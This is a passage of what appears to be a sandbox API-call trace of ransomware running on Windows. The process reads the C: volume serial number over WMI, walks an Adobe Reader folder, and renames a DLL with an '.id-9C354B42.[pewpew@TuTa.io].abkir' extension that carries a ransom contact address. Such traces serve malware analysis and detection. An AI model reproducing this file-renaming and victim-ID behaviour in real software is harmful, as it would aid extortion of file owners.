[0215.022] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee18*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee18*=0x20, pszText=0x0) returned 0x0 [0215.022] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee18*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee18*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0215.022] CoGetContextToken (in: pToken=0x8f6ea88 | out: pToken=0x8f6ea88) returned 0x0 [0215.022] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0215.022] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e91c | out: ppvObject=0x8f6e91c*=0xb5b154) returned 0x0 [0215.022] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x3 [0215.022] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0215.022] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0x20, pszText=0x0) returned 0x0 [0215.022] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee20*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee20*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0215.022] IWbemServices:GetObject (in: This=0x60332c4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6edd4*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6edd4*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0215.358] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x8f6edd4 | out: puCount=0x8f6edd4*=0x2) returned 0x0 [0215.358] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=4, puBuffLength=0x8f6edd0*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edd0*=0xf, pszText=0x0) returned 0x0 [0215.358] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=4, puBuffLength=0x8f6edd0*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edd0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0215.358] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35da4f4*=0, plFlavor=0x35da4f8*=0 | out: pVal=0x8f6edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35da4f4*=8, plFlavor=0x35da4f8*=0) returned 0x0 [0215.358] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.358] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.358] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6edd8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35da4f4*=8, plFlavor=0x35da4f8*=0 | out: pVal=0x8f6edd8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35da4f4*=8, plFlavor=0x35da4f8*=0) returned 0x0 [0215.358] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.358] SysStringByteLen (bstr="9C354B42") returned 0x10 [0215.358] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", nBufferLength=0x105, lpBuffer=0x8f6e9d8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll", lpFilePart=0x0) returned 0x39 [0215.358] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6e9d8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x5c [0215.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee38) returned 1 [0215.358] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll"), fInfoLevelId=0x0, lpFileInformation=0x8f6eeb4 | out: lpFileInformation=0x8f6eeb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x399ab6a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0215.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee34) returned 1 [0215.359] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\AiodLite.dll.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\aiodlite.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0215.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ef7c) returned 1 [0215.360] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader", nBufferLength=0x105, lpBuffer=0x8f6ea84, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader", lpFilePart=0x0) returned 0x2f [0215.360] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\", nBufferLength=0x105, lpBuffer=0x8f6ea58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\", lpFilePart=0x0) returned 0x30 [0215.360] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\*", lpFindFileData=0x8f6eca4 | out: lpFindFileData=0x8f6eca4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f590 [0215.360] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.360] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x32398, dwReserved0=0x0, dwReserved1=0x0, cFileName="A3DUtils.dll", cAlternateFileName="")) returned 1 [0215.361] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x803069c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc7d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACE.dll", cAlternateFileName="")) returned 1 [0215.361] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x47f98, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroBroker.exe", cAlternateFileName="ACROBR~1.EXE")) returned 1 [0215.361] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xf798, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrofx32.dll", cAlternateFileName="")) returned 1 [0215.361] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8051bd00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x16a0398, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroRd32.dll", cAlternateFileName="")) returned 1 [0215.361] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13ad98, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroRd32.exe", cAlternateFileName="")) returned 1 [0215.361] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x803069c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x45a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroRd32Info.exe", cAlternateFileName="ACRORD~1.EXE")) returned 1 [0215.362] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xbfa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroTextExtractor.exe", cAlternateFileName="ACROTE~1.EXE")) returned 1 [0215.362] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820095e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe.Reader.Dependencies.manifest", cAlternateFileName="ADOBER~1.MAN")) returned 1 [0215.362] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80541e60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x128fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.exe", cAlternateFileName="ADOBEC~1.EXE")) returned 1 [0215.362] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7de214c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb8fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeLinguistic.dll", cAlternateFileName="ADOBEL~1.DLL")) returned 1 [0215.362] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fe3480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x37398, dwReserved0=0x0, dwReserved1=0x0, cFileName="adoberfp.dll", cAlternateFileName="")) returned 1 [0215.362] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x803069c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4a598, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeXMP.dll", cAlternateFileName="")) returned 1 [0215.363] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80352c80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x53f988, dwReserved0=0x0, dwReserved1=0x0, cFileName="AGM.dll", cAlternateFileName="")) returned 1 [0215.363] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="AGMGPUOptIn.ini", cAlternateFileName="AGMGPU~1.INI")) returned 1 [0215.363] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8026e440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x366c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ahclient.dll", cAlternateFileName="")) returned 1 [0215.363] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802ba700, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AIR", cAlternateFileName="")) returned 1 [0215.363] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5ef398, dwReserved0=0x0, dwReserved1=0x0, cFileName="authplay.dll", cAlternateFileName="")) returned 1 [0215.363] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8051bd00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a9a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXE8SharedExpat.dll", cAlternateFileName="AXE8SH~1.DLL")) returned 1 [0215.364] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x91590, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXSLE.dll", cAlternateFileName="")) returned 1 [0215.364] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8051bd00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1af88, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIB.dll", cAlternateFileName="")) returned 1 [0215.364] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80378de0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x25b98, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIBUtils.dll", cAlternateFileName="")) returned 1 [0215.364] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d95e8c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Browser", cAlternateFileName="")) returned 1 [0215.364] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x802ba700, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1b4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ccme_base.dll", cAlternateFileName="CCME_B~1.DLL")) returned 1 [0215.364] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff9aa20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2aa998, dwReserved0=0x0, dwReserved1=0x0, cFileName="CoolType.dll", cAlternateFileName="")) returned 1 [0215.365] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x802945a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cryptocme2.dll", cAlternateFileName="CRYPTO~1.DLL")) returned 1 [0215.365] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8026e440, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x647, dwReserved0=0x0, dwReserved1=0x0, cFileName="cryptocme2.sig", cAlternateFileName="CRYPTO~1.SIG")) returned 1 [0215.365] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81df42a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17190, dwReserved0=0x0, dwReserved1=0x0, cFileName="Eula.exe", cAlternateFileName="")) returned 1 [0215.365] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820095e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa3ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtendScript.dll", cAlternateFileName="EXTEND~1.DLL")) returned 1 [0215.365] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb03a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="icucnv40.dll", cAlternateFileName="")) returned 1 [0215.365] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8202f740, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17790, dwReserved0=0x0, dwReserved1=0x0, cFileName="icudt40.dll", cAlternateFileName="")) returned 1 [0215.366] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x837d71e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xd46fa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="icudt40_full.dll", cAlternateFileName="ICUDT4~1.DLL")) returned 1 [0215.366] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: lpFindFileData=0x8f6ecb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1131a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="icuuc40.dll", cAlternateFileName="")) returned 1 [0215.366] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x8f6ecb4 | out: 